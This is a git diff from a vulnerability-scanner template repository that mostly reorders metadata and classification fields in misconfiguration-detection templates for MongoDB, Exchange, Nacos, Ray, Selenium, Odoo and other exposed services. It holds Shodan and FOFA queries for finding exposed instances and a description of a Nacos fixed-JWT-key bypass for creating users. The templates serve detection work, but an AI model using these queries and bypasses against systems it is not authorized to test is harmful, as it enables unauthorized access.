+39,4 @@ http: status: - 200 -# digest: 4a0a00473045022074265f61eea8f5d170a6a71de9470b85fa69ad269f080759c9b2b4237f05dc72022100af312aa6397b9b68a20b5c312e0bc870cfb6b57ee9fd193396ef950da766261b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022074265f61eea8f5d170a6a71de9470b85fa69ad269f080759c9b2b4237f05dc72022100af312aa6397b9b68a20b5c312e0bc870cfb6b57ee9fd193396ef950da766261b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml index 6ac8ba01ef..8eeaecd0ba 100644 --- a/http/misconfiguration/mongod-exposure.yaml +++ b/http/misconfiguration/mongod-exposure.yaml @@ -4,16 +4,16 @@ info: name: MongoD Server - Exposure author: DhiyaneshDk severity: low + classification: + cpe: cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"mongod" - product: mongodb vendor: mongodb + product: mongodb + shodan-query: html:"mongod" tags: mongod,exposure,info-leak - classification: - cpe: cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:* http: - raw: - | @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ms-exchange-user-enum.yaml b/http/misconfiguration/ms-exchange-user-enum.yaml index 223e16904e..4cd2a778d1 100644 --- a/http/misconfiguration/ms-exchange-user-enum.yaml +++ b/http/misconfiguration/ms-exchange-user-enum.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.msxfaq.de/exchange/autodiscover/autodiscover_v2.htm - https://github.com/righettod/toolbox-pentest-web/blob/master/docs/4-HINTS_ARCHIVED.md#user-enumeration-techniques-for-microsoft-exchange + classification: + cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:outlook exchange - product: exchange_server vendor: microsoft + product: exchange_server + shodan-query: http.title:outlook exchange tags: ms-exchange,microsoft,misconfig,enum - classification: - cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,5 @@ http: group: 1 regex: - '(?i)Email=([A-Za-z0-9@%.-_]+)' -# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/multilaser-pro-setup.yaml b/http/misconfiguration/multilaser-pro-setup.yaml index 40ef251883..d87f758efd 100644 --- a/http/misconfiguration/multilaser-pro-setup.yaml +++ b/http/misconfiguration/multilaser-pro-setup.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: This allows the user to access quick setup settings and configuration page through /wizard.htm. + classification: + cpe: cpe:2.3:o:multilaser:ac1200_re018_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029 - product: ac1200_re018_firmware vendor: multilaser + product: ac1200_re018_firmware + shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029 tags: misconfig,multilaser,setup,config - classification: - cpe: cpe:2.3:o:multilaser:ac1200_re018_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 4a0a0047304502202f346f311c3979bdbf5f0e4ad13b5cc8b8cf9e5e708f21e508af78d09427d817022100fa95cdf952736b2a2ca3e9d9b13f7384538016cad00d68d9bd7d687a29679f36:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202f346f311c3979bdbf5f0e4ad13b5cc8b8cf9e5e708f21e508af78d09427d817022100fa95cdf952736b2a2ca3e9d9b13f7384538016cad00d68d9bd7d687a29679f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/mysql-history.yaml b/http/misconfiguration/mysql-history.yaml index f3bd0bbe5a..8046be11b1 100644 --- a/http/misconfiguration/mysql-history.yaml +++ b/http/misconfiguration/mysql-history.yaml @@ -8,16 +8,16 @@ info: The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands. reference: - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html + classification: + cpe: cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"mysql_history" - product: mysql vendor: oracle + product: mysql + shodan-query: html:"mysql_history" tags: misconfig,disclosure,config - classification: - cpe: cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:* http: - method: GET path: @@ -55,4 +55,4 @@ http: status: - 200 -# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index c25cd9049f..05a011e1c7 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -8,16 +8,16 @@ info: Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions. reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: title:"Nacos" - product: nacos vendor: alibaba + product: nacos + shodan-query: title:"Nacos" tags: misconfig,nacos,unauth,bypass,instrusive - classification: - cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* http: - raw: - | @@ -42,4 +42,5 @@ http: - "status_code_1 == 200 && contains(body_1,'create user ok!')" - "status_code_3 == 200 && contains(body_3,'delete user ok!')" condition: and -# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml index 898f33d038..e10a4a9b81 100644 --- a/http/misconfiguration/ntop-panel-exposed.yaml +++ b/http/misconfiguration/ntop-panel-exposed.yaml @@ -4,16 +4,16 @@ info: name: ntop Network Traffix Exposed author: tess severity: unknown + classification: + cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Configure ntop" - product: ntopng vendor: ntop + product: ntopng + shodan-query: title:"Configure ntop" tags: misconfig,ntop,exposure - classification: - cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 490a0046304402204e3c7c97d0aeff2878966c6afa714c26feaa857831df52fae4d3a7ea7482a6ac022073a51c3f2066b5229aaf04aaa0f0feeaababd0f9d034eec3fdfe41cb3f818fa6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204e3c7c97d0aeff2878966c6afa714c26feaa857831df52fae4d3a7ea7482a6ac022073a51c3f2066b5229aaf04aaa0f0feeaababd0f9d034eec3fdfe41cb3f818fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml index 4e1cedde65..e0185a00d2 100644 --- a/http/misconfiguration/odoo-unprotected-database.yaml +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -8,16 +8,16 @@ info: The system has an Odoo application whose database manager is unprotected, indicating potential unauthorized access. remediation: | Implement and enforce proper authentication and access control measures to protect the Odoo database manager. + classification: + cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Odoo" - product: odoo vendor: odoo + product: odoo + shodan-query: title:"Odoo" tags: odoo,database,unauth,misconfig - classification: - cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 490a00463044022077bae65be56d0b9e92250e39058f9422f8263d55f5e2764bf87c25263e5d08f002202240a1ef4c069648261141c66f4a3607444e6b9abde00a45e15cca7efd1f1f09:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022077bae65be56d0b9e92250e39058f9422f8263d55f5e2764bf87c25263e5d08f002202240a1ef4c069648261141c66f4a3607444e6b9abde00a45e15cca7efd1f1f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/openstack-config.yaml b/http/misconfiguration/openstack-config.yaml index 4f24f1ae93..fabbb7f9ef 100644 --- a/http/misconfiguration/openstack-config.yaml +++ b/http/misconfiguration/openstack-config.yaml @@ -8,15 +8,15 @@ info: Openstack exposing Configuration or settings related to the Swift object storage system. reference: - https://docs.openstack.org/python-cloudkittyclient/stein/api_reference/info.html - metadata: - max-request: 2 - shodan-query: http.favicon.hash:786533217 - product: swift - vendor: openstack - tags: exposure,misconfig,openstack - classification: cpe: cpe:2.3:a:openstack:swift:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: openstack + product: swift + shodan-query: http.favicon.hash:786533217 + tags: exposure,misconfig,openstack + http: - method: GET path: @@ -42,4 +42,4 @@ http: status: - 200 -# digest: 4b0a00483046022100c504ae86098c92cdf1075b41054fd034ae21ecebd6d3aba49a10adb53a4c2356022100915148716537ac9841a78f79df37fb16c699ac1852fec8448ebb9746215f4d40:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c504ae86098c92cdf1075b41054fd034ae21ecebd6d3aba49a10adb53a4c2356022100915148716537ac9841a78f79df37fb16c699ac1852fec8448ebb9746215f4d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/oracle-reports-services.yaml b/http/misconfiguration/oracle-reports-services.yaml index fb5c8546ba..22121329cd 100644 --- a/http/misconfiguration/oracle-reports-services.yaml +++ b/http/misconfiguration/oracle-reports-services.yaml @@ -5,16 +5,16 @@ info: author: dogasantos severity: info description: Oracle Reports Services - Servlet Command dashboard + classification: + cpe: cpe:2.3:a:oracle:reports:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: title:"Oracle Forms" - product: reports vendor: oracle + product: reports + shodan-query: title:"Oracle Forms" tags: exposure,oracle,misconfig - classification: - cpe: cpe:2.3:a:oracle:reports:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: status: - 200 -# digest: 4a0a004730450220425d76c5277ab13703b75fa7f5d7d2b934e5d315ee27c61c3fdc27e57c28503802210094750ba826f32b994a2cb5bf6c45bbfd2beee643611fda120a68e6da43857ff0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220425d76c5277ab13703b75fa7f5d7d2b934e5d315ee27c61c3fdc27e57c28503802210094750ba826f32b994a2cb5bf6c45bbfd2beee643611fda120a68e6da43857ff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/pcdn-cache-node.yaml b/http/misconfiguration/pcdn-cache-node.yaml index d69978869c..7c32b74305 100644 --- a/http/misconfiguration/pcdn-cache-node.yaml +++ b/http/misconfiguration/pcdn-cache-node.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: PCDN Cache Node dataset is exposed. + classification: + cpe: cpe:2.3:a:cache-base_project:cache-base:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"PCDN Cache Node Dataset" - product: cache-base vendor: cache-base_project + product: cache-base + shodan-query: title:"PCDN Cache Node Dataset" tags: node,pcdn,misconfig - classification: - cpe: cpe:2.3:a:cache-base_project:cache-base:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089f5532f1677cb86d4d15b412b49ce9126c8f530843b4748c20af7699ea527cb022100d62f108e4c61aa3ffc432f1b1aa3d991ca17ea9c45850a324fea02d5c52ea70c:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210089f5532f1677cb86d4d15b412b49ce9126c8f530843b4748c20af7699ea527cb022100d62f108e4c61aa3ffc432f1b1aa3d991ca17ea9c45850a324fea02d5c52ea70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml index 86e8d4916c..70484b6e8c 100644 --- a/http/misconfiguration/perfsonar-toolkit.yaml +++ b/http/misconfiguration/perfsonar-toolkit.yaml @@ -7,16 +7,16 @@ info: description: perfSONAR Toolkit is exposed. reference: - https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828 + classification: + cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"perfSONAR" - product: perfsonar vendor: perfsonar + product: perfsonar + shodan-query: title:"perfSONAR" tags: misconfig,perfsonar,toolkit - classification: - cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/php-errors.yaml b/http/misconfiguration/php-errors.yaml index 20931178f5..7453fe0b7d 100644 --- a/http/misconfiguration/php-errors.yaml +++ b/http/misconfiguration/php-errors.yaml @@ -4,15 +4,15 @@ info: name: PHP errors author: w4cky_,geeknik,dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"PHP warning" || "Fatal error" - product: php - vendor: php - tags: debug,php,misconfig - classification: cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: php + product: php + shodan-query: http.title:"PHP warning" || "Fatal error" + tags: debug,php,misconfig + http: - method: GET path: @@ -48,4 +48,4 @@ http: - '(?i)Allowed Memory Size of \d* Bytes Exhausted' - '(?i)Maximum execution time of \d* seconds exceeded' -# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/phpcli-stack-trace.yaml b/http/misconfiguration/phpcli-stack-trace.yaml index 94a7292201..4d9a29f640 100644 --- a/http/misconfiguration/phpcli-stack-trace.yaml +++ b/http/misconfiguration/phpcli-stack-trace.yaml @@ -4,16 +4,16 @@ info: name: PHP CLI Server Stack Trace author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: The requested resource - product: php vendor: php + product: php + shodan-query: The requested resource tags: misconfig,phpcli,intrusive - classification: - cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,4 @@ http: status: - 404 -# digest: 490a004630440220562317d603c300e4d51bc22217a0758d3c43add49d3e2b342225826297c42be80220320994e9a1cd0b2cd620df74974b888e95118329cfd61f0de1d8952bc594d5a0:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220562317d603c300e4d51bc22217a0758d3c43add49d3e2b342225826297c42be80220320994e9a1cd0b2cd620df74974b888e95118329cfd61f0de1d8952bc594d5a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 0176222859..baacccca7c 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -7,15 +7,15 @@ info: description: Information Disclosure of Garbage Collection reference: - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c - metadata: - max-request: 1 - shodan-query: html:"python_gc_objects_collected_total" - product: python - vendor: python - tags: exposure,devops,python,misconfig - classification: cpe: cpe:2.3:a:python:python:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: python + product: python + shodan-query: html:"python_gc_objects_collected_total" + tags: exposure,devops,python,misconfig + http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 490a0046304402201c1902602bdf71d979bcc3407a11f2ed8f2e8672d4f5a16ba64f671d58c4085c022073e68a2bbd9673eff79de34d84b86a7942b2e35cf5a8e9ba9d50a42a1d6a308d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201c1902602bdf71d979bcc3407a11f2ed8f2e8672d4f5a16ba64f671d58c4085c022073e68a2bbd9673eff79de34d84b86a7942b2e35cf5a8e9ba9d50a42a1d6a308d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index b562edef53..e21c534a92 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: RabbitMQ Exporter is exposed. + classification: + cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"RabbitMQ Exporter" - product: rabbitmq vendor: vmware + product: rabbitmq + shodan-query: title:"RabbitMQ Exporter" tags: rabbitmq,exposure,debug,misconfig - classification: - cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 15b36fa00a..1949db8689 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: critical description: Ray Dashboard is exposed. + classification: + cpe: cpe:2.3:a:ray_project:ray:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Ray Dashboard" - product: ray vendor: ray_project + product: ray + shodan-query: title:"Ray Dashboard" tags: misconfig,exposure,ray - classification: - cpe: cpe:2.3:a:ray_project:ray:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml index 4cb64b6731..5c39dbd4b9 100644 --- a/http/misconfiguration/request-baskets-exposure.yaml +++ b/http/misconfiguration/request-baskets-exposure.yaml @@ -8,16 +8,16 @@ info: reference: - https://notes.sjtu.edu.cn/s/MUUhEymt7# - https://github.com/entr0pie/CVE-2023-27163 + classification: + cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"request-baskets" - product: request_baskets vendor: rbaskets + product: request_baskets + shodan-query: html:"request-baskets" tags: misconfig,requests-baskets,exposure - classification: - cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml index 3d012fc865..64e88e212a 100644 --- a/http/misconfiguration/selenium-exposure.yaml +++ b/http/misconfiguration/selenium-exposure.yaml @@ -9,16 +9,16 @@ info: reference: - https://nutcrackerssecurity.github.io/selenium.html - https://labs.detectify.com/2017/10/06/guest-blog-dont-leave-your-grid-wide-open/ + classification: + cpe: cpe:2.3:a:selenium:selenium:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "/wd/hub" - product: selenium vendor: selenium + product: selenium + shodan-query: "/wd/hub" tags: misconfig,selenium,misconfiguration,rce,chromium - classification: - cpe: cpe:2.3:a:selenium:selenium:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/sentinel-license-monitor.yaml b/http/misconfiguration/sentinel-license-monitor.yaml index c710705a2d..01d08e0c86 100644 --- a/http/misconfiguration/sentinel-license-monitor.yaml +++ b/http/misconfiguration/sentinel-license-monitor.yaml @@ -4,16 +4,16 @@ info: name: Sentinel License Monitor - Detect author: DhiyaneshDk severity: unknown + classification: + cpe: cpe:2.3:a:trioniclabs:sentinel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Sentinel License Monitor" - product: sentinel vendor: trioniclabs + product: sentinel + shodan-query: html:"Sentinel License Monitor" tags: misconfig,sentinel,license,monitor - classification: - cpe: cpe:2.3:a:trioniclabs:sentinel:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/servicenow-widget-misconfig.yaml b/http/misconfiguration/servicenow-widget-misconfig.yaml index 05a3f8d5db..fc6dc2be01 100644 --- a/http/misconfiguration/servicenow-widget-misconfig.yaml +++ b/http/misconfiguration/servicenow-widget-misconfig.yaml @@ -8,16 +8,16 @@ info: - https://github.com/bsysop/servicenow - https://twitter.com/ConspiracyProof/status/1713270026046685272 - https://www.enumerated.ie/servicenow-data-exposure + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 54 - shodan-query: title:"servicenow" - product: servicenow vendor: servicenow + product: servicenow + shodan-query: title:"servicenow" tags: servicenow,widget,misconfig - classification: - cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* http: - raw: - | @@ -86,4 +86,4 @@ http: regex: - '"count":([0-9]+),' -# digest: 4a0a0047304502202a6cd55766986fb7077ff3d1fa0acf790f1e71de0d403bee0981c3ede12711fc0221009919ff8cc46a4bbffbd550f5fe4809866ddd8e33800028982c6a53addd330860:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202a6cd55766986fb7077ff3d1fa0acf790f1e71de0d403bee0981c3ede12711fc0221009919ff8cc46a4bbffbd550f5fe4809866ddd8e33800028982c6a53addd330860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml index 4b4733da4f..59a9e993fb 100644 --- a/http/misconfiguration/sftpgo-admin-setup.yaml +++ b/http/misconfiguration/sftpgo-admin-setup.yaml @@ -6,16 +6,16 @@ info: severity: high description: | SFTPGo Admin Password setup page has been exposed. - metadata: - max-request: 1 - verified: true - fofa-query: title="SFTPGo - Setup" - product: sftpgo - vendor: sftpgo_project - tags: sftpgo,misconfig,setup - classification: cpe: cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sftpgo_project + product: sftpgo + fofa-query: title="SFTPGo - Setup" + tags: sftpgo,misconfig,setup + http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index 32ca3f449b..3073cb3183 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -5,16 +5,16 @@ info: author: tess severity: high description: SmarterStats Setup is exposed. + classification: + cpe: cpe:2.3:a:smartertools:smarterstats:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Welcome to SmarterStats!" - product: smarterstats vendor: smartertools + product: smarterstats + shodan-query: title:"Welcome to SmarterStats!" tags: misconfig,smarterstats,exposure - classification: - cpe: cpe:2.3:a:smartertools:smarterstats:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml index 1963457fa9..96db31b73a 100644 --- a/http/misconfiguration/smokeping-grapher.yaml +++ 